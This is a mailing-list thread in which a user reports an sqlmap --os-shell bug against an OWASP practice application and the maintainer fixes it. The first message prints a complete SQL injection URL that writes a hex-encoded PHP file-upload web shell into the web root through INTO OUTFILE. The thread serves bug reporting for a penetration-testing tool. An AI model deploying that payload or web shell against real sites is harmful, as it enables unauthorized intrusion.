Thank you for your report. Fixed with the latest revision (
https://github.com/sqlmapproject/sqlmap/issues/1290)
Bye
On Sun, Jul 5, 2015 at 1:16 AM, Danux <dan...@gmail.com> wrote:
> With yours is not throwing the error, you can reproduce my case with the
> owasppractice examples, I am attaching the source code here, you will need
> to setup the DB. Once up and running try lesson03:
>
> sqlmap.py -u
> http://OwaspPractice/injection/lessons/lesson03/index.php?code=N
> --os-shel l--prefix "\")" -v3
>
> it looks like the back-end DBMS is 'MySQL'. Do you want to skip test
> payloads specific for other DBMSes? [Y/n]
> Y
> for the remaining tests, do you want to include all tests for 'MySQL'
> extending provided level (1) and risk (1) values? [Y/n]
> n
>
> And should get the same error handling issue.
>
>
>
> On Sat, Jul 4, 2015 at 4:01 PM, Miroslav Stampar <
> miroslav.stam...@gmail.com> wrote:
>
>> Something is really wrong happening here. One user is having the
>> identical problem like you (AttributeError: 'NoneType' object has no
>> attribute 'replace') and I am not able to reproduce.
>>
>> Can you please rerun your sqlmap version with "
>> http://testphp.vulnweb.com/artists.php?artist=1"; and tell me if you get
>> the same error?
>>
>> Bye
>>
>> On Sun, Jul 5, 2015 at 12:57 AM, Danux <dan...@gmail.com> wrote:
>>
>>> Just clone git and got 1.0-dev-166dc98 version but got a unhandled
>>> exception error:
>>>
>>> ./sqlmap.py -u
>>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=N
>>> --os-shell --prefix "\")" --flush-session -v3
>>>
>>> /sqlmap'. If the exception persists, please open a new issue at '
>>> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
>>> text and any other information required to reproduce the bug. The
>>> developers will try to reproduce the bug, fix it accordingly and get back
>>> to you
>>> sqlmap version: 1.0-dev-166dc98
>>> Python version: 2.7.3
>>> Operating system: posix
>>> Command line: sqlmap.py -u
>>> *********************************************************************
>>> --os-shell --prefix ") --flush-session -v3
>>> Technique: None
>>> Back-end DBMS: MySQL (fingerprinted)
>>> Traceback (most recent call last):
>>> File "sqlmap.py", line 102, in main
>>> start()
>>> File "lib/controller/controller.py", line 514, in start
>>> injection = checkSqlInjection(place, parameter, value)
>>> File "lib/controller/checks.py", line 391, in checkSqlInjection
>>> reqPayload = agent.payload(place, parameter, newValue=boundPayload,
>>> where=where)
>>> File "lib/core/agent.py", line 188, in payload
>>> retVal = _(regex, "%s=%s" % (parameter,
>>> self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
>>> AttributeError: 'NoneType' object has no attribute 'replace'
>>>
>>>
>>> On Sat, Jul 4, 2015 at 3:43 PM, Miroslav Stampar <
>>> miroslav.stam...@gmail.com> wrote:
>>>
>>>> I believe that you are using an old revision. For a long time there is
>>>> at least a git revision or a pseudo "non-git" number appearing when "sqlmap
>>>> --version" is being used.
>>>>
>>>> Please update to the latest revision from the official github
>>>> repository and rerun the sqlmap.
>>>>
>>>> Bye
>>>>
>>>> On Sun, Jul 5, 2015 at 12:41 AM, Danux <dan...@gmail.com> wrote:
>>>>
>>>>> Thanks
>>>>>
>>>>> sqlmap --version
>>>>> sqlmap/1.0-dev
>>>>>
>>>>> In the meantime I will patch procs/mysql/write_file_limit.sql
>>>>>
>>>>>
>>>>>
>>>>>
>>>>> On Sat, Jul 4, 2015 at 3:40 PM, Miroslav Stampar <
>>>>> miroslav.stam...@gmail.com> wrote:
>>>>>
>>>>>> Which revision/version of sqlmap do you use? There has been a related
>>>>>> patch a month ago. Will check tomorrow.
>>>>>>
>>>>>> Bye
>>>>>>
>>>>>> On Sun, Jul 5, 2015 at 12:33 AM, Danux <dan...@gmail.com> wrote:
>>>>>>
>>>>>>> Hello list, there is an issue with sqlmap when using the --os-shell
>>>>>>> option in version sqlmap/1.0-dev and MySQL: 5.5.35-0+wheezy1 (Debian)
>>>>>>>
>>>>>>> Description:
>>>>>>>
>>>>>>> A specific PAYLOAD (see below) used to upload a web shell will
>>>>>>> create an empty file e.g. tmpbezff.php, this will cause that every
>>>>>>> subsequent PAYLOAD attempt will fail with an "already exist" error and
>>>>>>> therefore not able to upload the web shell.
>>>>>>>
>>>>>>>
>>>>>>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=NTGRWNR%22%29%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/OwaspPractice/upload/tmpupjed.php%27%20LINES%20TERMINATED%20BY%200x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777772f4f7761737050726163746963652f75706c6f61643e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a--+
>>>>>>>
>>>>>>> By default, MySQL will throw an error if the file already exists:
>>>>>>>
>>>>>>> mysql> select 'ss' into outfile
>>>>>>> '/var/www/OwaspPractice/upload/tmpbezff.php';
>>>>>>> ERROR 1086 (HY000): File
>>>>>>> '/var/www/OwaspPractice/upload/tmpbezff.php' already exists
>>>>>>>
>>>>>>> Solution:
>>>>>>>
>>>>>>> 1. Change the web shell name for every new PAYLOAD attempt, at least
>>>>>>> when using the -os-shell option
>>>>>>> 2. Fix the PAYLOAD causing problems.
>>>>>>>
>>>>>>> --
>>>>>>> DanUx
>>>>>>>
>>>>>>>
>>>>>>> ------------------------------------------------------------------------------
>>>>>>> Don't Limit Your Business. Reach for the Cloud.
>>>>>>> GigeNET's Cloud Solutions provide you with the tools and support that
>>>>>>> you need to offload your IT needs and focus on growing your business.
>>>>>>> Configured For All Businesses. Start Your Cloud Today.
>>>>>>> https://www.gigenetcloud.com/
>>>>>>> _______________________________________________
>>>>>>> sqlmap-users mailing list
>>>>>>> sqlmap-users@lists.sourceforge.net
>>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>>
>>>>>>>
>>>>>>
>>>>>>
>>>>>> --
>>>>>> Miroslav Stampar
>>>>>> http://about.me/stamparm
>>>>>>
>>>>>
>>>>>
>>>>>
>>>>> --
>>>>> DanUx
>>>>>
>>>>
>>>>
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm
>>>>
>>>
>>>
>>>
>>> --
>>> DanUx
>>>
>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>>
>
>
>
> --
> DanUx
>
--
Miroslav Stampar
http://about.me/stamparm
------------------------------------------------------------------------------
Don't Limit Your Business. Reach for the Cloud.
GigeNET's Cloud Solutions provide you with the tools and support that
you need to offload your IT needs and focus on growing your business.
Configured For All Businesses. Start Your Cloud Today.
https://www.gigenetcloud.com/
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
